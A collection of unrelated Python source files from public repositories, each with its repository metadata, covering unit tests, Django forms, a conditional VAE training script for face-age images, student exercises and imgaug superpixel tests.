value = encode_mac('000000000000')
self.assertEqual(len(value), 6)
self.assertEqual(value, b'\x00\x00\x00\x00\x00\x00')
value = encode_mac('000000000000', codec='base64')
self.assertEqual(value, b'AAAAAAAA')
| [
"hanno@hannosch.eu"
] | hanno@hannosch.eu |
d6173e859ed2ee3b0ead3b81a2fbabed554928d5 | 82555c9b4615a14bfe4bb46a0981820b7ccba8d7 | /D/test_pasted_from_page.py | 584aee8f24d578cb618a5ce84a837a36ea5a8976 | [
"MIT"
] | permissive | staguchi0703/ABC160 | 2f3cc23e0566943a76f288d190ee4977131817bb | d71c9756a2195a4f8b98dc0bb2d220e90cacdce3 | refs/heads/master | 2021-05-17T10:56:30.289570 | 2020-03-28T13:47:29 | 2020-03-28T13:47:29 | 250,745,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,137 | py | #
from resolve import resolve
####################################
####################################
# 以下にプラグインの内容をペーストする
#
import sys
from io import StringIO
import unittest
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_入力例_1(self):
input = """5 2 4"""
output = """5
4
1
0"""
self.assertIO(input, output)
def test_入力例_2(self):
input = """3 1 3"""
output = """3
0"""
self.assertIO(input, output)
def test_入力例_3(self):
input = """7 3 7"""
output = """7
8
4
2
0
0"""
self.assertIO(input, output)
def test_入力例_4(self):
input = """10 4 8"""
output = """10
12
10
8
4
1
0
0
0"""
self.assertIO(input, output)
if __name__ == "__main__":
unittest.main() | [
"s.taguchi0703@gmail.com"
] | s.taguchi0703@gmail.com |
a867dfcb3aaf4c1336a595ff3acbdb224162f108 | 80a1be2c9642341545e625685886ed8c93ed23b9 | /arriendoMiLibro/misLibrosOwner/forms.py | df2006d27b344b2e36f793597f6a4f7bb93ae2a6 | [] | no_license | leoBravoRain/arriendoMiLibro | 94a1923b68b052c3fd719412775db37508589459 | 35afd4b65385c15fd8372722200796329a225218 | refs/heads/master | 2020-08-07T16:09:06.065021 | 2018-06-26T02:34:55 | 2018-06-26T02:34:55 | 131,909,292 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,345 | py | # -*- coding: utf-8 -*-
from django import forms
from libros.models import LibrosParaArrendar
from django.forms import ModelForm
from usuarios.models import Usuario
from arriendoMiLibro.variablesGlobales import maxLengthDefault
# Editar informacion de usuaior
class EditarInformacionPerfilUsuario(ModelForm):
# ciudad = forms.ChoiceField(choices = Ciudad.objects.all())
class Meta:
model = Usuario
exclude = ["user","email","fechaCreacion", "password"]
widgets = {
'nombre': forms.TextInput(attrs={'placeholder': 'Nombre'}),
'numeroContacto': forms.TextInput(attrs={'placeholder': 'Numero de contacto'}),
# 'password': forms.PasswordInput(attrs={'placeholder': 'Clave'}),
}
# Editar libro
class EditarLibro(ModelForm):
class Meta:
model = LibrosParaArrendar
exclude = ['owner','fechaCreacion','estado']
widgets = {
'titulo': forms.TextInput(attrs={'placeholder': 'Titulo de libro'}),
'autor': forms.TextInput(attrs={'placeholder': 'Autor del libro'}),
'resumen': forms.Textarea(attrs={'placeholder': 'Breve resumen del libro', "maxlength" : maxLengthDefault, "size": maxLengthDefault, "class": "img-responsive"}),
'comentario': forms.Textarea(attrs={'placeholder': 'Comentario (idioma, estado del libro, etc)', "maxlength" : 10, "class": "img-responsive"}),
}
# Formulario para registrar a un owner
class AgregarLibro(ModelForm):
class Meta:
model = LibrosParaArrendar
exclude = ['owner','fechaCreacion','estado']
widgets = {
'titulo': forms.TextInput(attrs={'placeholder': 'Titulo de libro'}),
'autor': forms.TextInput(attrs={'placeholder': 'Autor del libro'}),
'resumen': forms.Textarea(attrs={'placeholder': 'Breve resumen del libro', "maxlength" : maxLengthDefault, "size": maxLengthDefault, "class": "img-responsive"}),
'comentario': forms.Textarea(attrs={'placeholder': 'Comentario (idioma, estado del libro, etc)', "maxlength" : 10, "class": "img-responsive"}),
}
help_texts = {
'foto' : 'Foto del libro',
}
# Fomulario para cambiar estado de libro
class CambiarEstadoDeLibro(ModelForm):
class Meta:
model = LibrosParaArrendar
fields = ["estado"]
| [
"gian.bravo@alumnos.usm.cl"
] | gian.bravo@alumnos.usm.cl |
1d7317c5593e293840bf5e1d1e80b861458d9130 | 99d8895888ab093b06a3ba03594f2a74cb97758f | /Scripts/Python_HSE/WEEK2/homework/solution15.py | e75292d209cd5b619f3431e2ffa630d73aa835f8 | [] | no_license | AlekseyAbakumov/PythonLearn | 4c35efeb0996f4a3221f228b57e30d595bb62637 | fdd2cc9bdaa0fac3d582ddd5f2fbf9018218bda5 | refs/heads/master | 2023-03-23T20:12:42.603817 | 2021-03-16T18:22:48 | 2021-03-16T18:22:48 | 265,309,409 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | a, b, c = (int(input()) for _ in range(3))
print(min(a, b, c), a + b + c - max(a, b, c) -
min(a, b, c), max(a, b, c))
| [
"a-starostin@mail.ru"
] | a-starostin@mail.ru |
c19ed886a185c04770d68ef2431f81e0caaa0cea | 9e594874044c08103d6f1a51b7ae79e44e09f769 | /UTKFace/CVAE/main.py | 7d892295b783460633f308abdb3af283f1b3d6a8 | [] | no_license | UBCDingXin/extra_experiments | 032239e6a98f273f84278425632834ead2a1faed | c424030e67069e13f7790186d15a0de2363abc1f | refs/heads/main | 2023-07-06T14:30:24.527329 | 2021-08-04T05:30:27 | 2021-08-04T05:30:27 | 382,233,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,973 | py | print("\n===================================================================================================")
import argparse
import copy
import gc
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.use('Agg')
import h5py
import os
import random
from tqdm import tqdm
import torch
import torchvision
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torchvision.utils import save_image
import timeit
from PIL import Image
from opts import parse_opts
args = parse_opts()
wd = args.root_path
os.chdir(wd)
from utils import *
from models import *
from trainer import train_cvae, sample_cvae_given_labels
from eval_metrics import cal_FID, cal_labelscore
#######################################################################################
''' Settings '''
#######################################################################################
#-------------------------------
# seeds
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = True
cudnn.benchmark = False
np.random.seed(args.seed)
#-------------------------------
# sampling parameters
assert args.eval_mode in [1,2,3,4] #evaluation mode must be in 1,2,3,4
if args.data_split == "all":
args.eval_mode != 1
#-------------------------------
# output folders
path_to_output = os.path.join(wd, "output/output_cvae_dimz_{}_dimc_{}_lr_{}".format(args.dim_z, args.dim_c, args.lr))
os.makedirs(path_to_output, exist_ok=True)
save_models_folder = os.path.join(path_to_output, 'saved_models')
os.makedirs(save_models_folder, exist_ok=True)
save_images_folder = os.path.join(path_to_output, 'saved_images')
os.makedirs(save_images_folder, exist_ok=True)
#######################################################################################
''' Data loader '''
#######################################################################################
# data loader
data_filename = args.data_path + '/UTKFace_{}x{}.h5'.format(args.img_size, args.img_size)
hf = h5py.File(data_filename, 'r')
labels = hf['labels'][:]
labels = labels.astype(float)
images = hf['images'][:]
hf.close()
# subset of UTKFace
selected_labels = np.arange(args.min_label, args.max_label+1)
for i in range(len(selected_labels)):
curr_label = selected_labels[i]
index_curr_label = np.where(labels==curr_label)[0]
if i == 0:
images_subset = images[index_curr_label]
labels_subset = labels[index_curr_label]
else:
images_subset = np.concatenate((images_subset, images[index_curr_label]), axis=0)
labels_subset = np.concatenate((labels_subset, labels[index_curr_label]))
# for i
images = images_subset
labels = labels_subset
del images_subset, labels_subset; gc.collect()
raw_images = copy.deepcopy(images)
raw_labels = copy.deepcopy(labels)
### show some real images
if args.show_real_imgs:
unique_labels_show = sorted(list(set(labels)))
nrow = len(unique_labels_show); ncol = 10
images_show = np.zeros((nrow*ncol, images.shape[1], images.shape[2], images.shape[3]))
for i in range(nrow):
curr_label = unique_labels_show[i]
indx_curr_label = np.where(labels==curr_label)[0]
np.random.shuffle(indx_curr_label)
indx_curr_label = indx_curr_label[0:ncol]
for j in range(ncol):
images_show[i*ncol+j,:,:,:] = images[indx_curr_label[j]]
print(images_show.shape)
images_show = (images_show/255.0-0.5)/0.5
images_show = torch.from_numpy(images_show)
save_image(images_show.data, save_images_folder +'/real_images_grid_{}x{}.png'.format(nrow, ncol), nrow=ncol, normalize=True)
# for each age, take no more than args.max_num_img_per_label images
image_num_threshold = args.max_num_img_per_label
print("\n Original set has {} images; For each age, take no more than {} images>>>".format(len(images), image_num_threshold))
unique_labels_tmp = np.sort(np.array(list(set(labels))))
for i in tqdm(range(len(unique_labels_tmp))):
indx_i = np.where(labels == unique_labels_tmp[i])[0]
if len(indx_i)>image_num_threshold:
np.random.shuffle(indx_i)
indx_i = indx_i[0:image_num_threshold]
if i == 0:
sel_indx = indx_i
else:
sel_indx = np.concatenate((sel_indx, indx_i))
images = images[sel_indx]
labels = labels[sel_indx]
print("{} images left.".format(len(images)))
hist_filename = wd + "/histogram_before_replica_unnormalized_age_" + str(args.img_size) + 'x' + str(args.img_size)
num_bins = len(list(set(labels)))
plt.figure()
plt.hist(labels, num_bins, facecolor='blue', density=False)
plt.savefig(hist_filename)
## replicate minority samples to alleviate the imbalance
max_num_img_per_label_after_replica = np.min([args.max_num_img_per_label_after_replica, args.max_num_img_per_label])
if max_num_img_per_label_after_replica>1:
unique_labels_replica = np.sort(np.array(list(set(labels))))
num_labels_replicated = 0
print("Start replicating monority samples >>>")
for i in tqdm(range(len(unique_labels_replica))):
# print((i, num_labels_replicated))
curr_label = unique_labels_replica[i]
indx_i = np.where(labels == curr_label)[0]
if len(indx_i) < max_num_img_per_label_after_replica:
num_img_less = max_num_img_per_label_after_replica - len(indx_i)
indx_replica = np.random.choice(indx_i, size = num_img_less, replace=True)
if num_labels_replicated == 0:
images_replica = images[indx_replica]
labels_replica = labels[indx_replica]
else:
images_replica = np.concatenate((images_replica, images[indx_replica]), axis=0)
labels_replica = np.concatenate((labels_replica, labels[indx_replica]))
num_labels_replicated+=1
#end for i
images = np.concatenate((images, images_replica), axis=0)
labels = np.concatenate((labels, labels_replica))
print("We replicate {} images and labels \n".format(len(images_replica)))
del images_replica, labels_replica; gc.collect()
# plot the histogram of unnormalized labels
hist_filename = wd + "/histogram_after_replica_unnormalized_age_" + str(args.img_size) + 'x' + str(args.img_size)
num_bins = len(list(set(labels)))
plt.figure()
plt.hist(labels, num_bins, facecolor='blue', density=False)
plt.savefig(hist_filename)
## normalize labels
labels = labels/args.max_label
#######################################################################################
''' CVAE training '''
#######################################################################################
start = timeit.default_timer()
print("\n Begin Training CVAE:")
Filename_CVAE = save_models_folder + '/ckpt_cvae_dimz_{}_dimc_{}_niters_{}_seed_{}.pth'.format(args.dim_z, args.dim_c, args.niters, args.seed)
print(Filename_CVAE)
save_images_in_train_folder = save_images_folder + '/images_in_train'
os.makedirs(save_images_in_train_folder, exist_ok=True)
if not os.path.isfile(Filename_CVAE):
net_encoder = CVAE_encoder(zdim=args.dim_z, ydim=args.dim_c).cuda()
net_decoder = CVAE_decoder(zdim=args.dim_z, ydim=args.dim_c).cuda()
net_encoder = nn.DataParallel(net_encoder)
net_decoder = nn.DataParallel(net_decoder)
# Start training
net_encoder, net_decoder, train_cvae_loss = train_cvae(images, labels, net_encoder, net_decoder, save_images_folder=save_images_in_train_folder, save_models_folder = save_models_folder)
# store model
torch.save({
'net_decoder_state_dict': net_decoder.state_dict(),
}, Filename_CVAE)
# plot training loss
loss_filename = save_models_folder + '/train_loss_cvae_dimz_{}_dimc_{}_niters_{}_seed_{}.png'.format(args.dim_z, args.dim_c, args.niters, args.seed)
PlotLoss(train_cvae_loss, loss_filename)
else:
print("Loading pre-trained generator >>>")
checkpoint = torch.load(Filename_CVAE)
net_decoder = CVAE_decoder(zdim=args.dim_z, ydim=args.dim_c).cuda()
net_decoder = nn.DataParallel(net_decoder)
net_decoder.load_state_dict(checkpoint['net_decoder_state_dict'])
def fn_sampleGAN_given_labels(labels, batch_size):
labels = labels*args.max_label
fake_images, fake_labels = sample_cvae_given_labels(net_decoder, given_labels=labels, batch_size = batch_size)
fake_labels = fake_labels / args.max_label
return fake_images, fake_labels
stop = timeit.default_timer()
print("CVAE training finished; Time elapses: {}s".format(stop - start))
#######################################################################################
''' Evaluation '''
#######################################################################################
if args.comp_FID:
#for FID
PreNetFID = encoder(dim_bottleneck=512).cuda()
PreNetFID = nn.DataParallel(PreNetFID)
Filename_PreCNNForEvalGANs = os.path.join(args.eval_ckpt_path, 'ckpt_AE_epoch_200_seed_2020_CVMode_False.pth')
checkpoint_PreNet = torch.load(Filename_PreCNNForEvalGANs)
PreNetFID.load_state_dict(checkpoint_PreNet['net_encoder_state_dict'])
# Diversity: entropy of predicted races within each eval center
PreNetDiversity = ResNet34_class(num_classes=5, ngpu = torch.cuda.device_count()).cuda() #5 races
Filename_PreCNNForEvalGANs_Diversity = os.path.join(args.eval_ckpt_path, 'ckpt_PreCNNForEvalGANs_ResNet34_class_epoch_200_seed_2020_classify_5_races_CVMode_False.pth')
checkpoint_PreNet = torch.load(Filename_PreCNNForEvalGANs_Diversity)
PreNetDiversity.load_state_dict(checkpoint_PreNet['net_state_dict'])
# for LS
PreNetLS = ResNet34_regre(ngpu = torch.cuda.device_count()).cuda()
Filename_PreCNNForEvalGANs_LS = os.path.join(args.eval_ckpt_path, 'ckpt_PreCNNForEvalGANs_ResNet34_regre_epoch_200_seed_2020_CVMode_False.pth')
checkpoint_PreNet = torch.load(Filename_PreCNNForEvalGANs_LS)
PreNetLS.load_state_dict(checkpoint_PreNet['net_state_dict'])
#####################
# generate nfake images
print("Start sampling {} fake images per label from GAN >>>".format(args.nfake_per_label))
eval_labels_norm = np.arange(1, args.max_label+1) / args.max_label # normalized labels for evaluation
num_eval_labels = len(eval_labels_norm)
for i in tqdm(range(num_eval_labels)):
curr_label = eval_labels_norm[i]
curr_fake_images, curr_fake_labels = fn_sampleGAN_given_labels(curr_label*np.ones([args.nfake_per_label,1]), args.samp_batch_size)
if i == 0:
fake_images = curr_fake_images
fake_labels_assigned = curr_fake_labels.reshape(-1)
else:
fake_images = np.concatenate((fake_images, curr_fake_images), axis=0)
fake_labels_assigned = np.concatenate((fake_labels_assigned, curr_fake_labels.reshape(-1)))
assert len(fake_images) == args.nfake_per_label*num_eval_labels
assert len(fake_labels_assigned) == args.nfake_per_label*num_eval_labels
## dump fake images for evaluation: NIQE
if args.dump_fake_for_NIQE:
print("\n Dumping fake images for NIQE...")
dump_fake_images_folder = save_images_folder + '/fake_images_for_NIQE_nfake_{}'.format(len(fake_images))
os.makedirs(dump_fake_images_folder, exist_ok=True)
for i in tqdm(range(len(fake_images))):
label_i = int(fake_labels_assigned[i]*args.max_label)
filename_i = dump_fake_images_folder + "/{}_{}.png".format(i, label_i)
os.makedirs(os.path.dirname(filename_i), exist_ok=True)
image_i = fake_images[i]
# image_i = ((image_i*0.5+0.5)*255.0).astype(np.uint8)
image_i_pil = Image.fromarray(image_i.transpose(1,2,0))
image_i_pil.save(filename_i)
#end for i
print("End sampling!")
print("\n We got {} fake images.".format(len(fake_images)))
#####################
# normalize images and labels
real_images = (raw_images/255.0-0.5)/0.5
real_labels = raw_labels/args.max_label
nfake_all = len(fake_images)
nreal_all = len(real_images)
fake_images = (fake_images/255.0-0.5)/0.5
#####################
# Evaluate FID within a sliding window with a radius R on the label's range (i.e., [1,max_label]). The center of the sliding window locate on [R+1,2,3,...,max_label-R].
center_start = 1+args.FID_radius
center_stop = args.max_label-args.FID_radius
centers_loc = np.arange(center_start, center_stop+1)
FID_over_centers = np.zeros(len(centers_loc))
entropies_over_centers = np.zeros(len(centers_loc)) # entropy at each center
labelscores_over_centers = np.zeros(len(centers_loc)) #label score at each center
num_realimgs_over_centers = np.zeros(len(centers_loc))
for i in range(len(centers_loc)):
center = centers_loc[i]
interval_start = (center - args.FID_radius)/args.max_label
interval_stop = (center + args.FID_radius)/args.max_label
indx_real = np.where((real_labels>=interval_start)*(real_labels<=interval_stop)==True)[0]
np.random.shuffle(indx_real)
real_images_curr = real_images[indx_real]
num_realimgs_over_centers[i] = len(real_images_curr)
indx_fake = np.where((fake_labels_assigned>=interval_start)*(fake_labels_assigned<=interval_stop)==True)[0]
np.random.shuffle(indx_fake)
fake_images_curr = fake_images[indx_fake]
fake_labels_assigned_curr = fake_labels_assigned[indx_fake]
# FID
FID_over_centers[i] = cal_FID(PreNetFID, real_images_curr, fake_images_curr, batch_size = 500, resize = None)
# Entropy of predicted class labels
predicted_class_labels = predict_class_labels(PreNetDiversity, fake_images_curr, batch_size=500, num_workers=args.num_workers)
entropies_over_centers[i] = compute_entropy(predicted_class_labels)
# Label score
labelscores_over_centers[i], _ = cal_labelscore(PreNetLS, fake_images_curr, fake_labels_assigned_curr, min_label_before_shift=0, max_label_after_shift=args.max_label, batch_size = 500, resize = None, num_workers=args.num_workers)
print("\r Center:{}; Real:{}; Fake:{}; FID:{}; LS:{}; ET:{}.".format(center, len(real_images_curr), len(fake_images_curr), FID_over_centers[i], labelscores_over_centers[i], entropies_over_centers[i]))
# average over all centers
print("\n CVAE SFID: {}({}); min/max: {}/{}.".format(np.mean(FID_over_centers), np.std(FID_over_centers), np.min(FID_over_centers), np.max(FID_over_centers)))
print("\n CVAE LS over centers: {}({}); min/max: {}/{}.".format(np.mean(labelscores_over_centers), np.std(labelscores_over_centers), np.min(labelscores_over_centers), np.max(labelscores_over_centers)))
print("\n CVAE entropy over centers: {}({}); min/max: {}/{}.".format(np.mean(entropies_over_centers), np.std(entropies_over_centers), np.min(entropies_over_centers), np.max(entropies_over_centers)))
# dump FID versus number of samples (for each center) to npy
dump_fid_ls_entropy_over_centers_filename = os.path.join(path_to_output, 'fid_ls_entropy_over_centers')
np.savez(dump_fid_ls_entropy_over_centers_filename, fids=FID_over_centers, labelscores=labelscores_over_centers, entropies=entropies_over_centers, nrealimgs=num_realimgs_over_centers, centers=centers_loc)
#####################
# FID: Evaluate FID on all fake images
indx_shuffle_real = np.arange(nreal_all); np.random.shuffle(indx_shuffle_real)
indx_shuffle_fake = np.arange(nfake_all); np.random.shuffle(indx_shuffle_fake)
FID = cal_FID(PreNetFID, real_images[indx_shuffle_real], fake_images[indx_shuffle_fake], batch_size = 500, resize = None)
print("\n CVAE: FID of {} fake images: {}.".format(nfake_all, FID))
#####################
# Overall LS: abs(y_assigned - y_predicted)
ls_mean_overall, ls_std_overall = cal_labelscore(PreNetLS, fake_images, fake_labels_assigned, min_label_before_shift=0, max_label_after_shift=args.max_label, batch_size = 500, resize = None, num_workers=args.num_workers)
print("\n CVAE: overall LS of {} fake images: {}({}).".format(nfake_all, ls_mean_overall, ls_std_overall))
#####################
# Dump evaluation results
eval_results_logging_fullpath = os.path.join(path_to_output, 'eval_results.txt')
if not os.path.isfile(eval_results_logging_fullpath):
eval_results_logging_file = open(eval_results_logging_fullpath, "w")
eval_results_logging_file.close()
with open(eval_results_logging_fullpath, 'a') as eval_results_logging_file:
eval_results_logging_file.write("\n===================================================================================================")
eval_results_logging_file.write("\n Radius: {}; # Centers: {}. \n".format(args.FID_radius, args.FID_num_centers))
print(args, file=eval_results_logging_file)
eval_results_logging_file.write("\n SFID: {}({}).".format(np.mean(FID_over_centers), np.std(FID_over_centers)))
eval_results_logging_file.write("\n LS: {}({}).".format(np.mean(labelscores_over_centers), np.std(labelscores_over_centers)))
eval_results_logging_file.write("\n Diversity: {}({}).".format(np.mean(entropies_over_centers), np.std(entropies_over_centers)))
#######################################################################################
''' Visualize fake images of the trained GAN '''
#######################################################################################
if args.visualize_fake_images:
# First, visualize conditional generation; vertical grid
## 10 rows; 3 columns (3 samples for each age)
n_row = 10
n_col = 3
displayed_labels = (np.linspace(0.05, 0.95, n_row)*args.max_label).astype(np.int)
# displayed_labels = np.array([3,9,15,21,27,33,39,45,51,57])
# displayed_labels = np.array([4,10,16,22,28,34,40,46,52,58])
displayed_normalized_labels = displayed_labels/args.max_label
### output fake images from a trained GAN
filename_fake_images = os.path.join(save_images_folder, 'fake_images_grid_{}x{}.png').format(n_row, n_col)
fake_labels_assigned = []
for tmp_i in range(len(displayed_normalized_labels)):
curr_label = displayed_normalized_labels[tmp_i]
fake_labels_assigned.append(np.ones(shape=[n_col, 1])*curr_label)
fake_labels_assigned = np.concatenate(fake_labels_assigned, axis=0)
images_show, _ = fn_sampleGAN_given_labels(fake_labels_assigned, args.samp_batch_size)
images_show = (images_show/255.0-0.5)/0.5
images_show = torch.from_numpy(images_show)
save_image(images_show.data, filename_fake_images, nrow=n_col, normalize=True)
#----------------------------------------------------------------
### output some real images as baseline
filename_real_images = save_images_folder + '/real_images_grid_{}x{}.png'.format(n_row, n_col)
if not os.path.isfile(filename_real_images):
images_show = np.zeros((n_row*n_col, args.num_channels, args.img_size, args.img_size))
for i_row in range(n_row):
curr_label = displayed_labels[i_row]
for j_col in range(n_col):
indx_curr_label = np.where(raw_labels==curr_label)[0]
np.random.shuffle(indx_curr_label)
indx_curr_label = indx_curr_label[0]
images_show[i_row*n_col+j_col] = raw_images[indx_curr_label]
images_show = (images_show/255.0-0.5)/0.5
images_show = torch.from_numpy(images_show)
save_image(images_show.data, filename_real_images, nrow=n_col, normalize=True)
print("\n===================================================================================================")
| [
"dingx92@gmail.com"
] | dingx92@gmail.com |
ac340560aaff7c0d0112525dfb2bca7378791bdc | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/183/usersdata/355/107995/submittedfiles/escadarolante.py | 1a3884391c6b48bee70782f254cce1adf18dbe87 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 299 | py | # -*- coding: utf-8 -*-
npessoas=int(input('Digite o número de pessoas detectadas pelo sensor: '))
soma=0
soma2=0
instante=0
for i in range(0,npessoas,1):
soma=instante-soma
soma2=soma2+soma
instante=float(input('Digite o instante em que a pessoa foi detectada: '))
print(soma2+10) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
42108bf9661896196414e28494cfdb5886d78a41 | 46b4220d668e07215c2b2ec7255edc31d51edb15 | /test/augmenters/test_segmentation.py | eb4755aa9d357ceb3f92691263a0388e517f29c9 | [
"MIT"
] | permissive | alisure-fork/imgaug | f5f848a65570785fd1a256f245fb47a975574daa | 037abbd0d9f8dd8949c10858bf4aa2f7762c6add | refs/heads/master | 2020-07-24T14:34:23.356424 | 2019-09-20T09:24:41 | 2019-09-20T09:24:41 | 207,956,502 | 0 | 0 | MIT | 2019-09-12T03:26:17 | 2019-09-12T03:26:15 | null | UTF-8 | Python | false | false | 51,650 | py | from __future__ import print_function, division, absolute_import
import sys
import warnings
# unittest only added in 3.4 self.subTest()
if sys.version_info[0] < 3 or sys.version_info[1] < 4:
import unittest2 as unittest
else:
import unittest
# unittest.mock is not available in 2.7 (though unittest2 might contain it?)
try:
import unittest.mock as mock
except ImportError:
import mock
import matplotlib
matplotlib.use('Agg') # fix execution of tests involving matplotlib on travis
import numpy as np
import six.moves as sm
from imgaug import augmenters as iaa
from imgaug import parameters as iap
from imgaug import dtypes as iadt
from imgaug import random as iarandom
from imgaug.testutils import reseed
class TestSuperpixels(unittest.TestCase):
def setUp(self):
reseed()
@classmethod
def _array_equals_tolerant(cls, a, b, tolerance):
# TODO isnt this just np.allclose(a, b, rtol=0, atol=tolerance) ?!
diff = np.abs(a.astype(np.int32) - b.astype(np.int32))
return np.all(diff <= tolerance)
@property
def base_img(self):
base_img = [
[255, 255, 255, 0, 0, 0],
[255, 235, 255, 0, 20, 0],
[250, 250, 250, 5, 5, 5]
]
base_img = np.tile(
np.array(base_img, dtype=np.uint8)[..., np.newaxis],
(1, 1, 3))
return base_img
@property
def base_img_superpixels(self):
base_img_superpixels = [
[251, 251, 251, 4, 4, 4],
[251, 251, 251, 4, 4, 4],
[251, 251, 251, 4, 4, 4]
]
base_img_superpixels = np.tile(
np.array(base_img_superpixels, dtype=np.uint8)[..., np.newaxis],
(1, 1, 3))
return base_img_superpixels
@property
def base_img_superpixels_left(self):
base_img_superpixels_left = self.base_img_superpixels
base_img_superpixels_left[:, 3:, :] = self.base_img[:, 3:, :]
return base_img_superpixels_left
@property
def base_img_superpixels_right(self):
base_img_superpixels_right = self.base_img_superpixels
base_img_superpixels_right[:, :3, :] = self.base_img[:, :3, :]
return base_img_superpixels_right
def test_p_replace_0_n_segments_2(self):
aug = iaa.Superpixels(p_replace=0, n_segments=2)
observed = aug.augment_image(self.base_img)
expected = self.base_img
assert np.allclose(observed, expected)
def test_p_replace_1_n_segments_2(self):
aug = iaa.Superpixels(p_replace=1.0, n_segments=2)
observed = aug.augment_image(self.base_img)
expected = self.base_img_superpixels
assert self._array_equals_tolerant(observed, expected, 2)
def test_p_replace_1_n_segments_stochastic_parameter(self):
aug = iaa.Superpixels(p_replace=1.0, n_segments=iap.Deterministic(2))
observed = aug.augment_image(self.base_img)
expected = self.base_img_superpixels
assert self._array_equals_tolerant(observed, expected, 2)
def test_p_replace_stochastic_parameter_n_segments_2(self):
aug = iaa.Superpixels(
p_replace=iap.Binomial(iap.Choice([0.0, 1.0])), n_segments=2)
observed = aug.augment_image(self.base_img)
assert (
np.allclose(observed, self.base_img)
or self._array_equals_tolerant(
observed, self.base_img_superpixels, 2)
)
def test_p_replace_050_n_segments_2(self):
aug = iaa.Superpixels(p_replace=0.5, n_segments=2)
seen = {"none": False, "left": False, "right": False, "both": False}
for _ in sm.xrange(100):
observed = aug.augment_image(self.base_img)
if self._array_equals_tolerant(observed, self.base_img, 2):
seen["none"] = True
elif self._array_equals_tolerant(
observed, self.base_img_superpixels_left, 2):
seen["left"] = True
elif self._array_equals_tolerant(
observed, self.base_img_superpixels_right, 2):
seen["right"] = True
elif self._array_equals_tolerant(
observed, self.base_img_superpixels, 2):
seen["both"] = True
else:
raise Exception(
"Generated superpixels image does not match any "
"expected image.")
if np.all(seen.values()):
break
assert np.all(seen.values())
def test_failure_on_invalid_datatype_for_p_replace(self):
# note that assertRaisesRegex does not exist in 2.7
got_exception = False
try:
_ = iaa.Superpixels(p_replace="test", n_segments=100)
except Exception as exc:
assert "Expected " in str(exc)
got_exception = True
assert got_exception
def test_failure_on_invalid_datatype_for_n_segments(self):
# note that assertRaisesRegex does not exist in 2.7
got_exception = False
try:
_ = iaa.Superpixels(p_replace=1, n_segments="test")
except Exception as exc:
assert "Expected " in str(exc)
got_exception = True
assert got_exception
def test_get_parameters(self):
aug = iaa.Superpixels(
p_replace=0.5, n_segments=2, max_size=100, interpolation="nearest")
params = aug.get_parameters()
assert isinstance(params[0], iap.Binomial)
assert isinstance(params[0].p, iap.Deterministic)
assert isinstance(params[1], iap.Deterministic)
assert 0.5 - 1e-4 < params[0].p.value < 0.5 + 1e-4
assert params[1].value == 2
assert params[2] == 100
assert params[3] == "nearest"
def test_other_dtypes_bool(self):
aug = iaa.Superpixels(p_replace=1.0, n_segments=2)
img = np.array([
[False, False, True, True],
[False, False, True, True]
], dtype=bool)
img_aug = aug.augment_image(img)
assert img_aug.dtype == img.dtype
assert np.all(img_aug == img)
aug = iaa.Superpixels(p_replace=1.0, n_segments=1)
img = np.array([
[True, True, True, True],
[False, True, True, True]
], dtype=bool)
img_aug = aug.augment_image(img)
assert img_aug.dtype == img.dtype
assert np.all(img_aug)
def test_other_dtypes_uint_int(self):
for dtype in [np.uint8, np.uint16, np.uint32,
np.int8, np.int16, np.int32]:
min_value, center_value, max_value = \
iadt.get_value_range_of_dtype(dtype)
if np.dtype(dtype).kind == "i":
values = [int(center_value), int(0.1 * max_value),
int(0.2 * max_value), int(0.5 * max_value),
max_value-100]
values = [((-1)*value, value) for value in values]
else:
values = [(0, int(center_value)),
(10, int(0.1 * max_value)),
(10, int(0.2 * max_value)),
(10, int(0.5 * max_value)),
(0, max_value),
(int(center_value),
max_value)]
for v1, v2 in values:
aug = iaa.Superpixels(p_replace=1.0, n_segments=2)
img = np.array([
[v1, v1, v2, v2],
[v1, v1, v2, v2]
], dtype=dtype)
img_aug = aug.augment_image(img)
assert img_aug.dtype == np.dtype(dtype)
assert np.array_equal(img_aug, img)
aug = iaa.Superpixels(p_replace=1.0, n_segments=1)
img = np.array([
[v2, v2, v2, v2],
[v1, v2, v2, v2]
], dtype=dtype)
img_aug = aug.augment_image(img)
assert img_aug.dtype == np.dtype(dtype)
assert np.all(img_aug == int(np.round((7/8)*v2 + (1/8)*v1)))
def test_other_dtypes_float(self):
# currently, no float dtype is actually accepted
for dtype in []:
def _allclose(a, b):
atol = 1e-4 if dtype == np.float16 else 1e-8
return np.allclose(a, b, atol=atol, rtol=0)
isize = np.dtype(dtype).itemsize
for value in [0, 1.0, 10.0, 1000 ** (isize - 1)]:
v1 = (-1) * value
v2 = value
aug = iaa.Superpixels(p_replace=1.0, n_segments=2)
img = np.array([
[v1, v1, v2, v2],
[v1, v1, v2, v2]
], dtype=dtype)
img_aug = aug.augment_image(img)
assert img_aug.dtype == np.dtype(dtype)
assert _allclose(img_aug, img)
aug = iaa.Superpixels(p_replace=1.0, n_segments=1)
img = np.array([
[v2, v2, v2, v2],
[v1, v2, v2, v2]
], dtype=dtype)
img_aug = aug.augment_image(img)
assert img_aug.dtype == np.dtype(dtype)
assert _allclose(img_aug, (7/8)*v2 + (1/8)*v1)
class Test_segment_voronoi(unittest.TestCase):
def setUp(self):
reseed()
def test_cell_coordinates_is_empty_integrationtest(self):
